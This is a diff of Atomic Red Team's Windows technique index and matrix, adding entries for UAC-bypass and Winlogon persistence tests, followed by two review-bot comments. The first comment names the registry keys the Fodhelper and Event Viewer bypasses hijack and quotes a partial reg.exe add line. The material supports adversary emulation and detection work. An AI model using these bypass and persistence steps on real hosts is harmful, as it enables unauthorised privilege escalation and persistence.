@@ -58,7 +58,7 @@ | | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Signed Script Proxy Execution](./T1216/T1216.md) | | | | | | | | | | Web Shell [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Software Packing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | [Windows Management Instrumentation Event Subscription](./T1084/T1084.md) | | [Space after Filename](./T1151/T1151.md) | | | | | | | -| | | Winlogon Helper DLL [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Template Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | +| | | [Winlogon Helper DLL](./T1004/T1004.md) | | Template Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | | | [Timestomp](./T1099/T1099.md) | | | | | | | | | | | | [Trusted Developer Utilities](./T1127/T1127.md) | | | | | | | | | | | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | diff --git a/atomics/windows-index.md b/atomics/windows-index.md index 2a216322..f6796ede 100644 --- a/atomics/windows-index.md +++ b/atomics/windows-index.md @@ -9,6 +9,9 @@ - [T1009 Binary Padding](./T1009/T1009.md) - [T1088 Bypass User Account Control](./T1088/T1088.md) - Atomic Test #1: Bypass UAC using Event Viewer [windows] + - Atomic Test #2: Bypass UAC using Event Viewer - PowerShell [windows] + - Atomic Test #3: Bypass UAC using Fodhelper [windows] + - Atomic Test #4: Bypass UAC using Fodhelper - PowerShell [windows] - [T1191 CMSTP](./T1191/T1191.md) - Atomic Test #1: CMSTP Executing Remote Scriptlet [windows] - Atomic Test #2: CMSTP Executing UAC Bypass [windows] 
@@ -140,6 +143,9 @@ - Atomic Test #1: Application Shim Installation [windows] - [T1088 Bypass User Account Control](./T1088/T1088.md) - Atomic Test #1: Bypass UAC using Event Viewer [windows] + - Atomic Test #2: Bypass UAC using Event Viewer - PowerShell [windows] + - Atomic Test #3: Bypass UAC using Fodhelper [windows] + - Atomic Test #4: Bypass UAC using Fodhelper - PowerShell [windows] - T1038 DLL Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1068 Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1181 Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -252,7 +258,10 @@ - [T1084 Windows Management Instrumentation Event Subscription](./T1084/T1084.md) - Atomic Test #1: Persistence [windows] - Atomic Test #2: Persistence Cleanup [windows] -- T1004 Winlogon Helper DLL [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1004 Winlogon Helper DLL](./T1004/T1004.md) + - Atomic Test #1: Winlogon Shell Key Persistence - PowerShell [windows] + - Atomic Test #2: Winlogon Userinit Key Persistence - PowerShell [windows] + - Atomic Test #3: Winlogon Notify Key Logon Persistence - PowerShell [windows] # discovery - [T1087 Account Discovery](./T1087/T1087.md) diff --git a/atomics/windows-matrix.md b/atomics/windows-matrix.md index 63cb48ef..e3927fb0 100644 --- a/atomics/windows-matrix.md +++ b/atomics/windows-matrix.md 
@@ -42,7 +42,7 @@ | | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Regsvcs/Regasm](./T1121/T1121.md) | | | | | | | | | | Web Shell [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Regsvr32](./T1117/T1117.md) | | | | | | | | | | [Windows Management Instrumentation Event Subscription](./T1084/T1084.md) | | [Rootkit](./T1014/T1014.md) | | | | | | | -| | | Winlogon Helper DLL [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Rundll32](./T1085/T1085.md) | | | | | | | +| | | [Winlogon Helper DLL](./T1004/T1004.md) | | [Rundll32](./T1085/T1085.md) | | | | | | | | | | | | SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | | | [Scripting](./T1064/T1064.md) | | | | | | | | | | | | [Signed Binary Proxy Execution](./T1218/T1218.md) | | | | | | |
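Review bot: in the atomics/index.yaml hunk (@@ -9361,6 +9544,61 @@), the new "Bypass UAC using Event Viewer - PowerShell" test declares `executor: name: command_prompt` while its command block is PowerShell (`New-Item`, `Set-ItemProperty`, `Start-Process`); run under cmd.exe those lines fail, so change it to `name: powershell` as the "Bypass UAC using Fodhelper - PowerShell" entry in the same hunk already does. In the command_prompt Fodhelper test, `reg.exe add hkcu\software\classes\ms-settings\shell\open\command /v "DelegateExecute"` lacks `/f` (the preceding `reg.exe add` line has it), so a repeat run prompts for overwrite confirmation and blocks a non-interactive executor. None of the four tests removes the `HKCU\software\classes\mscfile` or `ms-settings` `shell\open\command` keys it writes, so the hijack stays on the host after the test completes; document the matching `reg.exe delete ... /f` / `Remove-Item` cleanup with each test so the environment is restored and detection engineers know the expected key lifetime. Minor: each quoted description ends with an empty `+` line before the closing `'`, which embeds a trailing blank line in the string and renders as an empty paragraph in the generated docs.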
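Review bot: in the atomics/windows-index.md hunk (@@ -9,6 +9,9 @@), the context line `- [T1009 Binary Padding](./T1009/T1009.md)` is followed directly by T1088 with no "Atomic Test" entry beneath it, while the linux-index.md and macos-index.md hunks list T1009's only test as `[macos, linux]`; either a Windows test for T1009 is missing from the generated index, or the generator should render the technique as "CONTRIBUTE A TEST" here like the other untested Windows techniques rather than linking a page with no Windows-applicable test. The duplicate T1088 listing in the @@ -140,6 +143,9 @@ hunk is expected, since the index groups by tactic and T1088 maps to both defense-evasion and privilege-escalation.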